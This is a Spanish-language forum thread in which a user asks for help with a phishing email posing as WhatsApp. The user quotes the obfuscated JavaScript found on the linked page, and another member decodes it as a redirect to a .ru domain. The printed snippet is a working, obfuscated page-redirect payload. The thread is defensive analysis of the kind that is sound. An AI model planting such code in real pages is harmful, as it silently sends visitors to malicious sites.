elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Email con script sospechoso		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Email con script sospechoso  (Leído 3,331 veces)
novato3

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Email con script sospechoso
« en: 20 Marzo 2016, 23:26 pm »
Hola a todos hoy recién recibí un mail en nombre de Whatsapp con el siguiente link:

Web: xttp://abbodesign.nl/obeying.php

Al final del código fuente encuentro el siguiente script:

Código:
<script type="text/javascript">
function harmlesse() { harmlessa=46; harmlessb=[165,151,156,146,157,165,92,162,157,158,92,154,157,145,143,162,151,157,156,92,150,160,147,148,107,85,150,162,162,158,104,93,93,149,154,157,144,143,154,150,147,143,154,162,150,161,163,158,158,154,167,92,160,163,85,105]; harmlessc=""; for(harmlessd=0;harmlessd<harmlessb.length;harmlessd++) { harmlessc+=String.fromCharCode(harmlessb[harmlessd]-harmlessa); } return harmlessc; } setTimeout(harmlesse(),1280);
</script>

He intentado desofuscar el código de forma online en jsbeautifier pero no consigo nada.

Saludos y gracias.
En línea
Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: Email con script sospechoso
« Respuesta #1 en: 21 Marzo 2016, 11:10 am »
Esa secuencia de bytes en teoria contiene "window.to.location.href='htt://globalhealthsuly.ru'i"  y ese dominio no parece existir. que raro.
En línea
novato3

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Email con script sospechoso
« Respuesta #2 en: 21 Marzo 2016, 21:14 pm »
Hola gracias por responder, podrías decirme como lo has descodificado? :huh:

Cada vez que entro a la web, function cambia de nombre, es aleatorio  :-X

Saludos y gracias.
En línea
Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: Email con script sospechoso
« Respuesta #3 en: 22 Marzo 2016, 01:06 am »
Cita de: novato3 en 21 Marzo 2016, 21:14 pm
Hola gracias por responder, podrías decirme como lo has descodificado? :huh:

Cada vez que entro a la web, function cambia de nombre, es aleatorio  :-X

Saludos y gracias.
String.fromCharCode(harmlessb[harmlessd]-harmlessa
harmlesa=46
harmlessb[harmlessd] es cada uno de los números de harmlessb, restas a esos números el 46 y lo pasas de decimal a ascii.
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Script Batch para enviar email
Scripting 		vpluque 7 31,296 Último mensaje 22 Junio 2012, 19:52 pm
por Esgrimidor
HDD Sospechoso
Hardware 		itzg3 3 2,202 Último mensaje 19 Mayo 2013, 20:07 pm
por simorg
corporate email - email corporativo , alternativas a Gmail, Outlook y Yahoo
Desarrollo Web 		Graphixx 0 3,547 Último mensaje 20 Diciembre 2014, 22:40 pm
por Graphixx
Script para hacer pings y reenviat txt a email
Scripting 		SocSoc 3 3,757 Último mensaje 24 Diciembre 2014, 11:45 am
por Eleкtro
Internet Sospechoso
Windows 		Alessandro_Martini 7 3,846 Último mensaje 29 Mayo 2020, 17:53 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines